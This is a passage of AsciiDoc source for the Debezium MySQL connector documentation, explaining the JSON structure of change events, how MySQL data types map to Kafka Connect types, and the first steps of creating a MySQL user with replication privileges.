like this:\n\n[source,json,index=0]\n----\n{\n \"schema\": { <1>\n \"type\": \"struct\",\n \"name\": \"mysql-server-1.inventory.customers.Key\", <2>\n \"optional\": false, <3>\n \"fields\": [ <4>\n {\n \"field\": \"id\",\n \"type\": \"int32\",\n \"optional\": false\n }\n ]\n },\n \"payload\": { <5>\n \"id\": 1001\n }\n}\n----\n\n.Description of change event key\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The schema portion of the key specifies a Kafka Connect schema that describes what is in the key's `payload` portion. \n\n|2\n|`mysql-server-1.inventory.customers.Key`\na|Name of the schema that defines the structure of the key's payload. This schema describes the structure of the primary key for the table that was changed. Key schema names have the format _connector-name_._database-name_._table-name_.`Key`. In this example: + \n\n* `mysql-server-1` is the name of the connector that generated this event. + \n* `inventory` is the database that contains the table that was changed. +\n* `customers` is the table that was updated.\n\n|3\n|`optional`\n|Indicates whether the event key must contain a value in its `payload` field. In this example, a value in the key's payload is required. A value in the key's payload field is optional when a table does not have a primary key.\n\n|4\n|`fields` \n|Specifies each field that is expected in the `payload`, including each field's name, type, and whether it is required.\n\n|5\n|`payload`\n|Contains the key for the row for which this change event was generated. In this example, the key, contains a single `id` field whose value is `1001`.\n\n|===\n\n\/\/ Type: concept\n\/\/ ModuleID: about-values-in-debezium-mysql-change-events\n\/\/ Title: About values in {prodname} MySQL change events\n[[mysql-change-event-values]]\n=== Change event values\n\nThe value in a change event is a bit more complicated than the key. Like the key, the value has a `schema` section and a `payload` section. The `schema` section contains the schema that describes the `Envelope` structure of the `payload` section, including its nested fields. Change events for operations that create, update or delete data all have a value payload with an envelope structure. \n\nConsider the same sample table that was used to show an example of a change event key: \n\n[source,sql]\n----\nCREATE TABLE customers (\n id INTEGER NOT NULL AUTO_INCREMENT PRIMARY KEY,\n first_name VARCHAR(255) NOT NULL,\n last_name VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL UNIQUE KEY\n) AUTO_INCREMENT=1001;\n----\n\nThe value portion of a change event for a change to this table is described for: \n\n* <<mysql-create-events,_create_ events>>\n* <<mysql-update-events,_update_ events>>\n* <<mysql-primary-key-updates,Primary key updates>>\n* <<mysql-delete-events,_delete_ events>>\n* <<mysql-tombstone-events,Tombstone events>>\n\n\/\/ Type: continue\n[id=\"mysql-create-events\"]\n=== _create_ events\n\nThe following example shows the value portion of a change event that the connector generates for an operation that creates data in the `customers` table: \n\n[source,json,options=\"nowrap\",subs=\"+attributes\"]\n----\n{\n \"schema\": { \/\/ <1>\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ],\n \"optional\": true,\n \"name\": \"mysql-server-1.inventory.customers.Value\", \/\/ <2>\n \"field\": \"before\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"id\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"first_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"last_name\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"email\"\n }\n ],\n \"optional\": true,\n \"name\": \"mysql-server-1.inventory.customers.Value\", \n \"field\": \"after\"\n },\n {\n \"type\": \"struct\",\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"connector\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_sec\"\n },\n {\n \"type\": \"boolean\",\n \"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"db\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"table\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"server_id\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"gtid\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"file\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"pos\"\n },\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"row\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"thread\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"query\"\n }\n ],\n \"optional\": false,\n \"name\": \"io.debezium.connector.mysql.Source\", \/\/ <3>\n \"field\": \"source\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"op\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"ts_ms\"\n }\n ],\n \"optional\": false,\n \"name\": \"mysql-server-1.inventory.customers.Envelope\" \/\/ <4>\n },\n \"payload\": { \/\/ <5>\n \"op\": \"c\", \/\/ <6>\n \"ts_ms\": 1465491411815, \/\/ <7>\n \"before\": null, \/\/ <8>\n \"after\": { \/\/ <9>\n \"id\": 1004,\n \"first_name\": \"Anne\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"source\": { \/\/ <10>\n \"version\": \"{debezium-version}\",\n \"connector\": \"mysql\",\n \"name\": \"mysql-server-1\",\n \"ts_sec\": 0,\n \"snapshot\": false,\n \"db\": \"inventory\",\n \"table\": \"customers\",\n \"server_id\": 0,\n \"gtid\": null,\n \"file\": \"mysql-bin.000003\",\n \"pos\": 154,\n \"row\": 0,\n \"thread\": 7,\n \"query\": \"INSERT INTO customers (first_name, last_name, email) VALUES ('Anne', 'Kretchmar', 'annek@noanswer.org')\"\n }\n }\n}\n----\n\n.Descriptions of _create_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The value's schema, which describes the structure of the value's payload. A change event's value schema is the same in every change event that the connector generates for a particular table. \n\n|2\n|`name`\na|In the `schema` section, each `name` field specifies the schema for a field in the value's payload. +\n +\n`mysql-server-1.inventory.customers.Value` is the schema for the payload's `before` and `after` fields. This schema is specific to the `customers` table. +\n +\nNames of schemas for `before` and `after` fields are of the form `_logicalName_._tableName_.Value`, which ensures that the schema name is unique in the database. This means that when using the {link-prefix}:{link-avro-serialization}[Avro converter], the resulting Avro schema for each table in each logical source has its own evolution and history.\n\n|3\n|`name`\n|`io.debezium.connector.mysql.Source` is the schema for the payload's `source` field. This schema is specific to the MySQL connector. The connector uses it for all events that it generates. \n\n|4\n|`name`\n|`mysql-server-1.inventory.customers.Envelope` is the schema for the overall structure of the payload, where `mysql-server-1` is the connector name, `inventory` is the database, and `customers` is the table.\n\n|5\n|`payload`\n|The value's actual data. This is the information that the change event is providing. +\n +\nIt may appear that the JSON representations of the events are much larger than the rows they describe. This is because the JSON representation must include the schema and the payload portions of the message.\nHowever, by using the {link-prefix}:{link-avro-serialization}[Avro converter], you can significantly decrease the size of the messages that the connector streams to Kafka topics.\n\n|6\n|`op`\na| Mandatory string that describes the type of operation that caused the connector to generate the event. In this example, `c` indicates that the operation created a row. Valid values are: \n\n* `c` = create\n* `u` = update\n* `d` = delete\n* `r` = read (applies to only snapshots)\n\n|7\n|`ts_ms`\na| Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task.\n\n|8\n|`before`\n| An optional field that specifies the state of the row before the event occurred. When the `op` field is `c` for create, as it is in this example, the `before` field is `null` since this change event is for new content. \n\n|9\n|`after`\n| An optional field that specifies the state of the row after the event occurred. In this example, the `after` field contains the values of the new row's `id`, `first_name`, `last_name`, and `email` columns.\n\n|10\n|`source`\na| Mandatory field that describes the source metadata for the event. This field contains information that you can use to compare this event with other events, with regard to the origin of the events, the order in which the events occurred, and whether events were part of the same transaction. The source metadata includes: \n\n* {prodname} version\n* Connector name\n* binlog name where the event was recorded\n* binlog position\n* Row within the event\n* If the event was part of a snapshot\n* Name of the database and table that contain the new row\n* ID of the MySQL thread that created the event (non-snapshot only)\n* MySQL server ID (if available)\n* Timestamp\n\nIf the {link-prefix}:{link-mysql-connector}#enable-query-log-events[`binlog_rows_query_log_events`] MySQL configuration option is enabled and the connector configuration `include.query` property is enabled, the `source` field also provides the `query` field, which contains the original SQL statement that caused the change event.\n\n|===\n\n\/\/ Type: continue\n[id=\"mysql-update-events\"]\n=== _update_ events\n\nThe value of a change event for an update in the sample `customers` table has the same schema as a _create_ event for that table. Likewise, the event value's payload has the same structure. However, the event value payload contains different values in an _update_ event. Here is an example of a change event value in an event that the connector generates for an update in the `customers` table: \n\n[source,json,options=\"nowrap\",subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"id\": 1004,\n \"first_name\": \"Anne\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"after\": { \/\/ <2>\n \"id\": 1004,\n \"first_name\": \"Anne Marie\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"name\": \"mysql-server-1\",\n \"connector\": \"mysql\",\n \"name\": \"mysql-server-1\",\n \"ts_sec\": 1465581,\n \"snapshot\": false,\n \"db\": \"inventory\",\n \"table\": \"customers\",\n \"server_id\": 223344,\n \"gtid\": null,\n \"file\": \"mysql-bin.000003\",\n \"pos\": 484,\n \"row\": 0,\n \"thread\": 7,\n \"query\": \"UPDATE customers SET first_name='Anne Marie' WHERE id=1004\"\n },\n \"op\": \"u\", \/\/ <4>\n \"ts_ms\": 1465581029523 \n }\n}\n----\n\n.Descriptions of _update_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|An optional field that specifies the state of the row before the event occurred. In an _update_ event value, the `before` field contains a field for each table column and the value that was in that column before the database commit. In this example, the `first_name` value is `Anne.`\n\n|2\n|`after`\n| An optional field that specifies the state of the row after the event occurred. You can compare the `before` and `after` structures to determine what the update to this row was. In the example, the `first_name` value is now `Anne Marie`. \n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. The `source` field structure has the same fields as in a _create_ event, but some values are different, for example, the sample _update_ event is from a different position in the binlog. The source metadata includes: \n\n* {prodname} version\n* Connector name\n* binlog name where the event was recorded\n* binlog position\n* Row within the event\n* If the event was part of a snapshot\n* Name of the database and table that contain the updated row\n* ID of the MySQL thread that created the event (non-snapshot only)\n* MySQL server ID (if available)\n* Timestamp\n\nIf the {link-prefix}:{link-mysql-connector}#enable-query-log-events[`binlog_rows_query_log_events`] MySQL configuration option is enabled and the connector configuration `include.query` property is enabled, the `source` field also provides the `query` field, which contains the original SQL statement that caused the change event.\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. In an _update_ event value, the `op` field value is `u`, signifying that this row changed because of an update.\n\n|===\n\n[NOTE]\n====\nUpdating the columns for a row's primary\/unique key changes the value of the row's key. When a key changes, {prodname} outputs _three_ events: a `DELETE` event and a {link-prefix}:{link-mysql-connector}#mysql-tombstone-events[tombstone event] with the old key for the row, followed by an event with the new key for the row. Details are in the next section. \n====\n\n\/\/ Type: continue\n[id=\"mysql-primary-key-updates\"]\n=== Primary key updates\n\nAn `UPDATE` operation that changes a row's primary key field(s) is known\nas a primary key change. For a primary key change, in place of an `UPDATE` event record, the connector emits a `DELETE` event record for the old key and a `CREATE` event record for the new (updated) key. These events have the usual structure and content, and in addition, each one has a message header related to the primary key change: \n\n* The `DELETE` event record has `__debezium.newkey` as a message header. The value of this header is the new primary key for the updated row.\n\n* The `CREATE` event record has `__debezium.oldkey` as a message header. The value of this header is the previous (old) primary key that the updated row had.\n\n\/\/ Type: continue\n[id=\"mysql-delete-events\"]\n=== _delete_ events\n\nThe value in a _delete_ change event has the same `schema` portion as _create_ and _update_ events for the same table. The `payload` portion in a _delete_ event for the sample `customers` table looks like this: \n\n[source,json,options=\"nowrap\",subs=\"+attributes\"]\n----\n{\n \"schema\": { ... },\n \"payload\": {\n \"before\": { \/\/ <1>\n \"id\": 1004,\n \"first_name\": \"Anne Marie\",\n \"last_name\": \"Kretchmar\",\n \"email\": \"annek@noanswer.org\"\n },\n \"after\": null, \/\/ <2>\n \"source\": { \/\/ <3>\n \"version\": \"{debezium-version}\",\n \"connector\": \"mysql\",\n \"name\": \"mysql-server-1\",\n \"ts_sec\": 1465581,\n \"snapshot\": false,\n \"db\": \"inventory\",\n \"table\": \"customers\",\n \"server_id\": 223344,\n \"gtid\": null,\n \"file\": \"mysql-bin.000003\",\n \"pos\": 805,\n \"row\": 0,\n \"thread\": 7,\n \"query\": \"DELETE FROM customers WHERE id=1004\"\n },\n \"op\": \"d\", \/\/ <4>\n \"ts_ms\": 1465581902461 \/\/ <5>\n }\n}\n----\n\n.Descriptions of _delete_ event value fields\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`before`\n|Optional field that specifies the state of the row before the event occurred. In a _delete_ event value, the `before` field contains the values that were in the row before it was deleted with the database commit.\n\n|2\n|`after`\n| Optional field that specifies the state of the row after the event occurred. In a _delete_ event value, the `after` field is `null`, signifying that the row no longer exists.\n\n|3\n|`source`\na|Mandatory field that describes the source metadata for the event. In a _delete_ event value, the `source` field structure is the same as for _create_ and _update_ events for the same table. Many `source` field values are also the same. In a _delete_ event value, the `ts_ms` and `pos` field values, as well as other values, might have changed. But the `source` field in a _delete_ event value provides the same metadata: \n\n* {prodname} version\n* Connector name\n* binlog name where the event was recorded\n* binlog position\n* Row within the event\n* If the event was part of a snapshot\n* Name of the database and table that contain the updated row\n* ID of the MySQL thread that created the event (non-snapshot only)\n* MySQL server ID (if available)\n* Timestamp\n\nIf the {link-prefix}:{link-mysql-connector}#enable-query-log-events[`binlog_rows_query_log_events`] MySQL configuration option is enabled and the connector configuration `include.query` property is enabled, the `source` field also provides the `query` field, which contains the original SQL statement that caused the change event.\n\n|4\n|`op`\na|Mandatory string that describes the type of operation. The `op` field value is `d`, signifying that this row was deleted.\n\n|5\n|`ts_ms`\na|Optional field that displays the time at which the connector processed the event. The time is based on the system clock in the JVM running the Kafka Connect task.\n\n|===\n\nA _delete_ change event record provides a consumer with the information it needs to process the removal of this row. The old values are included because some consumers might require them in order to properly handle the removal.\n\nMySQL connector events are designed to work with link:{link-kafka-docs}\/#compaction[Kafka log compaction]. Log compaction enables removal of some older messages as long as at least the most recent message for every key is kept. This lets Kafka reclaim storage space while ensuring that the topic contains a complete data set and can be used for reloading key-based state.\n\n\/\/ Type: continue\n[id=\"mysql-tombstone-events\"]\n=== Tombstone events\nWhen a row is deleted, the _delete_ event value still works with log compaction, because Kafka can remove all earlier messages that have that same key. However, for Kafka to remove all messages that have that same key, the message value must be `null`. To make this possible, after {prodname}\u2019s MySQL connector emits a _delete_ event, the connector emits a special tombstone event that has the same key but a `null` value.\n\n\/\/ Type: reference\n\/\/ ModuleID: how-debezium-mysql-connectors-map-data-types\n\/\/ Title: How {prodname} MySQL connectors map data types\n[[mysql-data-types]]\n== Data type mappings\n\nThe {prodname} MySQL connector represents changes to rows with events that are structured like the table in which the row exists. The event contains a field for each column value. The MySQL data type of that column dictates how {prodname} represents the value in the event.\n\nColumns that store strings are defined in MySQL with a character set and collation. The MySQL connector uses the column's character set when reading the binary representation of the column values in the binlog events. \n\nThe connector can map MySQL data types to both _literal_ and _semantic_ types.\n\n* *Literal type*: how the value is represented using Kafka Connect schema types\n* *Semantic type*: how the Kafka Connect schema captures the meaning of the field (schema name)\n\nifdef::product[]\nDetails are in the following sections:\n\n* xref:mysql-basic-types[]\n* xref:mysql-temporal-types[]\n* xref:mysql-decimal-types[]\n* xref:mysql-boolean-values[]\n* xref:mysql-spatial-types[]\n\nendif::product[]\n\n[id=\"mysql-basic-types\"]\n=== Basic types\n\nThe following table shows how the connector maps basic MySQL data types.\n\n.Descriptions of basic type mappings\n[cols=\"25%a,20%a,55%a\",options=\"header\",subs=\"+attributes\"]\n|===\n|MySQL type |Literal type |Semantic type\n\n|`BOOLEAN, BOOL`\n|`BOOLEAN`\na|_n\/a_\n\n|`BIT(1)`\n|`BOOLEAN`\na|_n\/a_\n\n|`BIT(>1)`\n|`BYTES`\na|`io.debezium.data.Bits` +\nThe `length` schema parameter contains an integer that represents the number of bits. The `byte[]` contains the bits in _little-endian_ form and is sized to contain the specified number of bits. For example, where `n` is bits: +\n`numBytes = n\/8 + (n%8== 0 ? 0 : 1)`\n\n|`TINYINT`\n|`INT16`\na|_n\/a_\n\n|`SMALLINT[(M)]`\n|`INT16`\na|_n\/a_\n\n|`MEDIUMINT[(M)]`\n|`INT32`\na|_n\/a_\n\n|`INT, INTEGER[(M)]`\n|`INT32`\na|_n\/a_\n\n|`BIGINT[(M)]`\n|`INT64`\na|_n\/a_\n\n|`REAL[(M,D)]`\n|`FLOAT32`\na|_n\/a_\n\n|`FLOAT[(M,D)]`\n|`FLOAT64`\na|_n\/a_\n\n|`DOUBLE[(M,D)]`\n|`FLOAT64`\na|_n\/a_\n\n|`CHAR(M)]`\n|`STRING`\na|_n\/a_\n\n|`VARCHAR(M)]`\n|`STRING`\na|_n\/a_\n\n|`BINARY(M)]`\n|`BYTES` or `STRING`\na|_n\/a_ +\nEither the raw bytes (the default), a base64-encoded String, or a hex-encoded String, based on the {link-prefix}:{link-mysql-connector}#mysql-property-binary-handling-mode[`binary.handling.mode`] connector configuration property setting.\n\n|`VARBINARY(M)]`\n|`BYTES` or `STRING`\na|_n\/a_ +\nEither the raw bytes (the default), a base64-encoded String, or a hex-encoded String, based on the {link-prefix}:{link-mysql-connector}#mysql-property-binary-handling-mode[`binary.handling.mode`] connector configuration property setting.\n\n|`TINYBLOB`\n|`BYTES` or `STRING`\na|_n\/a_ +\nEither the raw bytes (the default), a base64-encoded String, or a hex-encoded String, based on the {link-prefix}:{link-mysql-connector}#mysql-property-binary-handling-mode[`binary.handling.mode`] connector configuration property setting.\n\n|`TINYTEXT`\n|`STRING`\na|_n\/a_\n\n|`BLOB`\n|`BYTES` or `STRING`\na|_n\/a_ +\nEither the raw bytes (the default), a base64-encoded String, or a hex-encoded String, based on the {link-prefix}:{link-mysql-connector}#mysql-property-binary-handling-mode[`binary.handling.mode`] connector configuration property setting.\n\n|`TEXT`\n|`STRING`\na|_n\/a_\n\n|`MEDIUMBLOB`\n|`BYTES` or `STRING`\na|_n\/a_ +\nEither the raw bytes (the default), a base64-encoded String, or a hex-encoded String, based on the {link-prefix}:{link-mysql-connector}#mysql-property-binary-handling-mode[`binary.handling.mode`] connector configuration property setting.\n\n|`MEDIUMTEXT`\n|`STRING`\na|_n\/a_\n\n|`LONGBLOB`\n|`BYTES` or `STRING`\na|_n\/a_ +\nEither the raw bytes (the default), a base64-encoded String, or a hex-encoded String, based on the {link-prefix}:{link-mysql-connector}#mysql-property-binary-handling-mode[`binary.handling.mode`] connector configuration property setting.\n\n|`LONGTEXT`\n|`STRING`\na|_n\/a_\n\n|`JSON`\n|`STRING`\na|`io.debezium.data.Json` +\nContains the string representation of a `JSON` document, array, or scalar.\n\n|`ENUM`\n|`STRING`\na|`io.debezium.data.Enum` +\nThe `allowed` schema parameter contains the comma-separated list of allowed values.\n\n|`SET`\n|`STRING`\na|`io.debezium.data.EnumSet` +\nThe `allowed` schema parameter contains the comma-separated list of allowed values.\n\n|`YEAR[(2\\|4)]`\n|`INT32`\n|`io.debezium.time.Year`\n\n|`TIMESTAMP[(M)]`\n|`STRING`\na|`io.debezium.time.ZonedTimestamp` +\nIn link:https:\/\/www.iso.org\/iso-8601-date-and-time-format.html[ISO 8601] format with microsecond precision. MySQL allows `M` to be in the range of `0-6`.\n\n|===\n\n[id=\"mysql-temporal-types\"]\n=== Temporal types\n\nExcluding the `TIMESTAMP` data type, MySQL temporal types depend on the value of the `time.precision.mode` connector configuration property. For `TIMESTAMP` columns whose default value is specified as `CURRENT_TIMESTAMP` or `NOW`, the value `1970-01-01 00:00:00` is used as the default value in the Kafka Connect schema. \n\nMySQL allows zero-values for `DATE, `DATETIME`, and `TIMESTAMP` columns because zero-values are sometimes preferred over null values. The MySQL connector represents zero-values as null values when the column definition allows null values, or as the epoch day when the column does not allow null values.\n\n.Temporal values without time zones\nThe `DATETIME` type represents a local date and time such as \"2018-01-13 09:48:27\". As you can see, there is no time zone information. Such columns are converted into epoch milliseconds or microseconds based on the column\u2019s precision by using UTC. The `TIMESTAMP` type represents a timestamp without time zone information. It is converted by MySQL from the server (or session\u2019s) current time zone into UTC when writing and from UTC into the server (or session's) current time zone when reading back the value. For example:\n\n* `DATETIME` with a value of `2018-06-20 06:37:03` becomes `1529476623000`.\n* `TIMESTAMP` with a value of `2018-06-20 06:37:03` becomes `2018-06-20T13:37:03Z`.\n\nSuch columns are converted into an equivalent `io.debezium.time.ZonedTimestamp` in UTC based on the server (or session\u2019s) current time zone. The time zone will be queried from the server by default. If this fails, it must be specified explicitly by the database `serverTimezone` MySQL configuration option. For example, if the database\u2019s time zone (either globally or configured for the connector by means of the `serverTimezone` option) is \"America\/Los_Angeles\", the TIMESTAMP value \"2018-06-20 06:37:03\" is represented by a `ZonedTimestamp` with the value \"2018-06-20T13:37:03Z\".\n\nThe time zone of the JVM running Kafka Connect and Debezium does not affect these conversions.\n\nMore details about properties related to termporal values are in the documentation for {link-prefix}:{link-mysql-connector}#mysql-connector-properties[MySQL connector configuration properties].\n\ntime.precision.mode=adaptive_time_microseconds(default)::\nThe MySQL connector determines the literal type and semantic type based on the column's data type definition so that events represent exactly the values in the database. All time fields are in microseconds. Only positive `TIME` field values in the range of `00:00:00.000000` to `23:59:59.999999` can be captured correctly.\n+\n.Mappings when `time.precision.mode=adaptive_time_microseconds`\n[cols=\"25%a,20%a,55%a\",options=\"header\",subs=\"+attributes\"]\n|===\n|MySQL type |Literal type |Semantic type\n\n|`DATE`\n|`INT32`\na|`io.debezium.time.Date` +\nRepresents the number of days since the epoch.\n\n|`TIME[(M)]`\n|`INT64`\na|`io.debezium.time.MicroTime` +\nRepresents the time value in microseconds and does not include time zone information. MySQL allows `M` to be in the range of `0-6`.\n\n|`DATETIME, DATETIME(0), DATETIME(1), DATETIME(2), DATETIME(3)`\n|`INT64`\na|`io.debezium.time.Timestamp` +\nRepresents the number of milliseconds past the epoch and does not include time zone information.\n\n|`DATETIME(4), DATETIME(5), DATETIME(6)`\n|`INT64`\na|`io.debezium.time.MicroTimestamp` +\nRepresents the number of microseconds past the epoch and does not include time zone information.\n\n|===\n\ntime.precision.mode=connect::\nThe MySQL connector uses defined Kafka Connect logical types. This approach is less precise than the default approach and the events could be less precise if the database column has a _fractional second precision_ value of greater than `3`. Values in only the range of `00:00:00.000` to `23:59:59.999` can be handled. Set `time.precision.mode=connect` only if you can ensure that the `TIME` values in your tables never exceed the supported ranges. The `connect` setting is expected to be removed in a future version of {prodname}.\n+\n.Mappings when `time.precision.mode=connect`\n[cols=\"25%a,20%a,55%a\",options=\"header\",subs=\"+attributes\"]\n|===\n|MySQL type |Literal type |Semantic type\n\n|`DATE`\n|`INT32`\na|`org.apache.kafka.connect.data.Date` +\nRepresents the number of days since the epoch.\n\n|`TIME[(M)]`\n|`INT64`\na|`org.apache.kafka.connect.data.Time` +\nRepresents the time value in microseconds since midnight and does not include time zone information.\n\n|`DATETIME[(M)]`\n|`INT64`\na|`org.apache.kafka.connect.data.Timestamp` +\nRepresents the number of milliseconds since the epoch, and does not include time zone information.\n\n|===\n\n[id=\"mysql-decimal-types\"]\n=== Decimal types\n\n{prodname} connectors handle decimals according to the setting of the {link-prefix}:{link-mysql-connector}#mysql-property-decimal-handling-mode[`decimal.handling.mode` connector configuration property]. \n\ndecimal.handling.mode=precise::\n+\n.Mappings when `decimal.handing.mode=precise`\n[cols=\"30%a,15%a,55%a\",options=\"header\",subs=\"+attributes\"]\n|===\n|MySQL type |Literal type |Semantic type\n\n|`NUMERIC[(M[,D])]`\n|`BYTES`\na|`org.apache.kafka.connect.data.Decimal` +\nThe `scale` schema parameter contains an integer that represents how many digits the decimal point shifted.\n\n|`DECIMAL[(M[,D])]`\n|`BYTES`\na|`org.apache.kafka.connect.data.Decimal` +\nThe `scale` schema parameter contains an integer that represents how many digits the decimal point shifted.\n\n|===\n\ndecimal.handling.mode=double::\n+\n.Mappings when `decimal.handing.mode=double`\n[cols=\"30%a,30%a,40%a\",options=\"header\",subs=\"+attributes\"]\n|===\n|MySQL type |Literal type |Semantic type\n\n|`NUMERIC[(M[,D])]`\n|`FLOAT64`\na|_n\/a_\n\n|`DECIMAL[(M[,D])]`\n|`FLOAT64`\na|_n\/a_\n\n|===\n\ndecimal.handling.mode=string::\n+\n.Mappings when `decimal.handing.mode=string`\n[cols=\"30%a,30%a,40%a\",options=\"header\",subs=\"+attributes\"]\n|===\n|MySQL type |Literal type |Semantic type\n\n|`NUMERIC[(M[,D])]`\n|`STRING`\na|_n\/a_\n\n|`DECIMAL[(M[,D])]`\n|`STRING`\na|_n\/a_\n\n|===\n\n[id=\"mysql-boolean-values\"]\n=== Boolean values\n\nMySQL handles the `BOOLEAN` value internally in a specific way.\nThe `BOOLEAN` column is internally mapped to the `TINYINT(1)` data type.\nWhen the table is created during streaming then it uses proper `BOOLEAN` mapping as {prodname} receives the original DDL.\nDuring snapshots, {prodname} executes `SHOW CREATE TABLE` to obtain table definitions that return `TINYINT(1)` for both `BOOLEAN` and `TINYINT(1)` columns. {prodname} then has no way to obtain the original type mapping and so maps to `TINYINT(1)`.\n\nifdef::community[]\nThe operator can configure the out-of-the-box {link-prefix}:{link-custom-converters}[`TinyIntOneToBooleanConverter` custom converter] that would either map all `TINYINT(1)` columns to `BOOLEAN` or if the `selector` parameter is set then a subset of columns could be enumerated using comma-separated regular expressions.\nendif::community[]\n\nFollowing is an example configuration:\n\n----\nconverters=boolean\nboolean.type=io.debezium.connector.mysql.converters.TinyIntOneToBooleanConverter\nboolean.selector=db1.table1.*, db1.table2.column1\n----\n\n[id=\"mysql-spatial-types\"]\n=== Spatial types\n\nCurrently, the {prodname} MySQL connector supports the following spatial data types.\n\n.Description of spatial type mappings\n[cols=\"35%a,15%a,50%a\",options=\"header\",subs=\"+attributes\"]\n|===\n|MySQL type |Literal type |Semantic type\n\n|`GEOMETRY, +\nLINESTRING, +\nPOLYGON, +\nMULTIPOINT, +\nMULTILINESTRING, +\nMULTIPOLYGON, +\nGEOMETRYCOLLECTION`\n|`STRUCT`\na|`io.debezium.data.geometry.Geometry` +\nContains a structure with two fields:\n\n* `srid (INT32`: spatial reference system ID that defines the type of geometry object stored in the structure\n* `wkb (BYTES)`: binary representation of the geometry object encoded in the Well-Known-Binary (wkb) format. See the link:https:\/\/www.opengeospatial.org\/standards\/sfa[Open Geospatial Consortium] for more details.\n\n|===\n\n\/\/ Type: assembly\n\/\/ ModuleID: setting-up-mysql-to-run-a-debezium-connector\n\/\/ Title: Setting up MySQL to run a {prodname} connector\n[[setting-up-mysql]]\n== Set up\n\nSome MySQL setup tasks are required before you can install and run a {prodname} connector. \n\nifdef::product[]\nDetails are in the following sections:\n\n* xref:creating-a-mysql-user-for-a-debezium-connector[]\n* xref:enabling-the-mysql-binlog-for-debezium[]\n* xref:enabling-mysql-gtids-for-debezium[]\n* xref:configuring-mysql-session-timeouts-for-debezium[]\n* xref:enabling-query-log-events-for-debezium-mysql-connectors[]\n\nendif::product[]\n\n\/\/ Type: procedure\n\/\/ ModuleID: creating-a-mysql-user-for-a-debezium-connector\n\/\/ Title: Creating a MySQL user for a {prodname} connector\n[[mysql-creating-user]]\n=== Creating a user \n\nA {prodname} MySQL connector requires a MySQL user account. This MySQL user must have appropriate permissions on all databases for which the {prodname} MySQL connector captures changes.\n\n.Prerequisites\n\n* A MySQL server.\n* Basic knowledge of SQL commands.\n\n.Procedure\n\n. Create the MySQL user:\n+\n[source,SQL]\n----\nmysql> CREATE USER 'user'@'localhost' IDENTIFIED BY 'password';\n----\n\n. Grant the required permissions to the user:\n+\n[source,SQL]\n----\nmysql> GRANT SELECT, RELOAD, SHOW DATABASES, REPLICATION SLAVE, REPLICATION CLIENT ON *.* TO 'user' IDENTIFIED BY 'password';\n----\n+\nThe table below describes the permissions. \n+\nIMPORTANT: If using a hosted option such as Amazon RDS or Amazon Aurora that does not allow a global read lock, table-level locks are used to create the _consistent snapshot_. In this case, you need to also grant `LOCK_TABLES` permissions to the user that you create. See {link-prefix}:{link-mysql-connector}#mysql-snapshots[snapshots] for more details.\n\n. Finalize the user's permissions:\n+\n[source,SQL]\n----\nmysql> FLUSH PRIVILEGES;\n----\n\n[[permissions-explained-mysql-connector]]\n.Descriptions of user permissions\n[cols=\"3,7\",options=\"header\",subs=\"+attributes\"]\n|===\n|Keyword |Description\n\n|`SELECT`\n|Enables the connector to select rows from tables in databases. This is used only when performing a snapshot.\n\n|`RELOAD`\n|Enables the connector the use of the `FLUSH` statement to clear or reload internal caches, flush tables, or acquire locks. This is used only when performing a snapshot.\n\n|`SHOW DATABASES`\n|Enables the connector to see database names by issuing the `SHOW DATABASE` statement. This is used only when performing a snapshot.\n\n|`REPLICATION SLAVE`\n|Enables the connector to connect to and read the MySQL server binlog.\n\n|`REPLICATION CLIENT`\na|Enables the connector the use of the following statements:\n\n* `SHOW MASTER STATUS`\n* `SHOW SLAVE STATUS`\n* `SHOW BINARY LOGS`\n\nThe 